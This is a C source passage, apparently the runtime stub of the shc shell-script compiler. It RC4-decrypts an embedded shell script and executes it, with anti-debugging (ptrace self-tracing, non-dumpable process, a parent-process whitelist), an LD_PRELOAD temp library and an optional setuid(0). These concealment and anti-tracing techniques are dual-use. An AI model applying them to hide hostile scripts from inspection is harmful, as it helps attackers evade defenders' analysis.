	remove("/tmp/shc_x.c"); return 0;
}

void arc4_hardrun(void * str, int len) {
    //Decode locally
    char tmp2[len];
    char tmp3[len+1024];
    memcpy(tmp2, str, len);

	unsigned char tmp, * ptr = (unsigned char *)tmp2;
    int lentmp = len;
    int pid, status;
    pid = fork();

    shc_x_file();
    if (make()) {exit(1);}

    setenv("LD_PRELOAD","/tmp/shc_x.so",1);

    if(pid==0) {

        //Start tracing to protect from dump & trace
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
            kill(getpid(), SIGKILL);
            _exit(1);
        }

        //Decode Bash
        while (len > 0) {
            indx++;
            tmp = stte[indx];
            jndx += tmp;
            stte[indx] = stte[jndx];
            stte[jndx] = tmp;
            tmp += stte[indx];
            *ptr ^= stte[tmp];
            ptr++;
            len--;
        }

        //Do the magic
        sprintf(tmp3, "%s %s", "'********' 21<<<", tmp2);

        //Exec bash script //fork execl with 'sh -c'
        system(tmp2);

        //Empty script variable
        memcpy(tmp2, str, lentmp);

        //Clean temp
        remove("/tmp/shc_x.so");

        //Sinal to detach ptrace
        ptrace(PTRACE_DETACH, 0, 0, 0);
        exit(0);
    }
    else {wait(&status);}

    /* Seccomp Sandboxing - Start */
    seccomp_hardening();

    exit(0);
}
#endif /* HARDENING */

/*
 * Key with file invariants. 
 */
int key_with_file(char * file)
{
	struct stat statf[1];
	struct stat control[1];

	if (stat(file, statf) < 0)
		return -1;

	/* Turn on stable fields */
	memset(control, 0, sizeof(control));
	control->st_ino = statf->st_ino;
	control->st_dev = statf->st_dev;
	control->st_rdev = statf->st_rdev;
	control->st_uid = statf->st_uid;
	control->st_gid = statf->st_gid;
	control->st_size = statf->st_size;
	control->st_mtime = statf->st_mtime;
	control->st_ctime = statf->st_ctime;
	key(control, sizeof(control));
	return 0;
}

#if DEBUGEXEC
void debugexec(char * sh11, int argc, char ** argv)
{
	int i;
	fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
	fprintf(stderr, "argc=%d\n", argc);
	if (!argv) {
		fprintf(stderr, "argv=<null>\n");
	} else { 
		for (i = 0; i <= argc ; i++)
			fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
	}
}
#endif /* DEBUGEXEC */

void rmarg(char ** argv, char * arg)
{
	for (; argv && *argv && *argv != arg; argv++);
	for (; argv && *argv; argv++)
		*argv = argv[1];
}

void chkenv_end(void);

int chkenv(int argc)
{
	char buff[512];
	unsigned long mask, m;
	int l, a, c;
	char * string;
	extern char ** environ;

	mask = (unsigned long)getpid();
	stte_0();
	 key(&chkenv, (void*)&chkenv_end - (void*)&chkenv);
	 key(&data, sizeof(data));
	 key(&mask, sizeof(mask));
	arc4(&mask, sizeof(mask));
	sprintf(buff, "x%lx", mask);
	string = getenv(buff);
#if DEBUGEXEC
	fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
	l = strlen(buff);
	if (!string) {
		/* 1st */
		sprintf(&buff[l], "=%lu %d", mask, argc);
		putenv(strdup(buff));
		return 0;
	}
	c = sscanf(string, "%lu %d%c", &m, &a, buff);
	if (c == 2 && m == mask) {
		/* 3rd */
		rmarg(environ, &string[-l - 1]);
		return 1 + (argc - a);
	}
	return -1;
}

void chkenv_end(void){}

#if HARDENING

static void gets_process_name(const pid_t pid, char * name) {
	char procfile[BUFSIZ];
	sprintf(procfile, "/proc/%d/cmdline", pid);
	FILE* f = fopen(procfile, "r");
	if (f) {
		size_t size;
		size = fread(name, sizeof (char), sizeof (procfile), f);
		if (size > 0) {
			if ('\n' == name[size - 1])
				name[size - 1] = '\0';
		}
		fclose(f);
	}
}

void hardening() {
    prctl(PR_SET_DUMPABLE, 0);
    prctl(PR_SET_PTRACER, -1);

    int pid = getppid();
    char name[256] = {0};
    gets_process_name(pid, name);

    if (   (strcmp(name, "bash") != 0) 
        && (strcmp(name, "/bin/bash") != 0) 
        && (strcmp(name, "sh") != 0) 
        && (strcmp(name, "/bin/sh") != 0) 
        && (strcmp(name, "sudo") != 0) 
        && (strcmp(name, "/bin/sudo") != 0) 
        && (strcmp(name, "/usr/bin/sudo") != 0)
        && (strcmp(name, "gksudo") != 0) 
        && (strcmp(name, "/bin/gksudo") != 0) 
        && (strcmp(name, "/usr/bin/gksudo") != 0) 
        && (strcmp(name, "kdesu") != 0) 
        && (strcmp(name, "/bin/kdesu") != 0) 
        && (strcmp(name, "/usr/bin/kdesu") != 0) 
       )
    {
        printf("Operation not permitted\n");
        kill(getpid(), SIGKILL);
        exit(1);
    }
}

#endif /* HARDENING */

#if !TRACEABLE

#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

#if !defined(PT_ATTACHEXC) /* New replacement for PT_ATTACH */
   #if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
       #define PT_ATTACHEXC	PT_ATTACH
   #elif defined(PTRACE_ATTACH)
       #define PT_ATTACHEXC PTRACE_ATTACH
   #endif
#endif

void untraceable(char * argv0)
{
	char proc[80];
	int pid, mine;

	switch(pid = fork()) {
	case  0:
		pid = getppid();
		/* For problematic SunOS ptrace */
#if defined(__FreeBSD__)
		sprintf(proc, "/proc/%d/mem", (int)pid);
#else
		sprintf(proc, "/proc/%d/as",  (int)pid);
#endif
		close(0);
		mine = !open(proc, O_RDWR|O_EXCL);
		if (!mine && errno != EBUSY)
			mine = !ptrace(PT_ATTACHEXC, pid, 0, 0);
		if (mine) {
			kill(pid, SIGCONT);
		} else {
			perror(argv0);
			kill(pid, SIGKILL);
		}
		_exit(mine);
	case -1:
		break;
	default:
		if (pid == waitpid(pid, 0, 0))
			return;
	}
	perror(argv0);
	_exit(1);
}
#endif /* !TRACEABLE */

char * xsh(int argc, char ** argv)
{
	char * scrpt;
	int ret, i, j;
	char ** varg;
	char * me = argv[0];
	if (me == NULL) { me = getenv("_"); }
	if (me == 0) { fprintf(stderr, "E: neither argv[0] nor $_ works."); exit(1); }

	ret = chkenv(argc);
	stte_0();
	 key(pswd, pswd_z);
	arc4(msg1, msg1_z);
	arc4(date, date_z);
	if (date[0] && (atoll(date)<time(NULL)))
		return msg1;
	arc4(shll, shll_z);
	arc4(inlo, inlo_z);
	arc4(xecc, xecc_z);
	arc4(lsto, lsto_z);
	arc4(tst1, tst1_z);
	 key(tst1, tst1_z);
	arc4(chk1, chk1_z);
	if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
		return tst1;
	arc4(msg2, msg2_z);
	if (ret < 0)
		return msg2;
	varg = (char **)calloc(argc + 10, sizeof(char *));
	if (!varg)
		return 0;
	if (ret) {
		arc4(rlax, rlax_z);
		if (!rlax[0] && key_with_file(shll))
			return shll;
		arc4(opts, opts_z);
#if HARDENING
	    arc4_hardrun(text, text_z);
	    exit(0);
       /* Seccomp Sandboxing - Start */
       seccomp_hardening();
#endif
		arc4(text, text_z);
		arc4(tst2, tst2_z);
		 key(tst2, tst2_z);
		arc4(chk2, chk2_z);
		if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
			return tst2;
		/* Prepend hide_z spaces to script text to hide it. */
		scrpt = malloc(hide_z + text_z);
		if (!scrpt)
			return 0;
		memset(scrpt, (int) ' ', hide_z);
		memcpy(&scrpt[hide_z], text, text_z);
	} else {			/* Reexecute */
		if (*xecc) {
			scrpt = malloc(512);
			if (!scrpt)
				return 0;
			sprintf(scrpt, xecc, me);
		} else {
			scrpt = me;
		}
	}
	j = 0;
#if BUSYBOXON
	varg[j++] = "busybox";
	varg[j++] = "sh";
#else
	varg[j++] = argv[0];		/* My own name at execution */
#endif
	if (ret && *opts)
		varg[j++] = opts;	/* Options on 1st line of code */
	if (*inlo)
		varg[j++] = inlo;	/* Option introducing inline code */
	varg[j++] = scrpt;		/* The script itself */
	if (*lsto)
		varg[j++] = lsto;	/* Option meaning last option */
	i = (ret > 1) ? ret : 0;	/* Args numbering correction */
	while (i < argc)
		varg[j++] = argv[i++];	/* Main run-time arguments */
	varg[j] = 0;			/* NULL terminated array */
#if DEBUGEXEC
	debugexec(shll, j, varg);
#endif
	execvp(shll, varg);
	return shll;
}

int main(int argc, char ** argv)
{
#if SETUID
   setuid(0);
#endif
#if DEBUGEXEC
	debugexec("main", argc, argv);
#endif
#if HARDENING
	hardening();
#endif
#if !TRACEABLE
	untraceable(argv[0]);
#endif
	argv[1] = xsh(argc, argv);
	fprintf(stderr, "%s%s%s: %s\n", argv[0],
		errno ? ": " : "",
		errno ? strerror(errno) : "",
		argv[1] ? argv[1] : "<null>"
	);
	return 1;
}
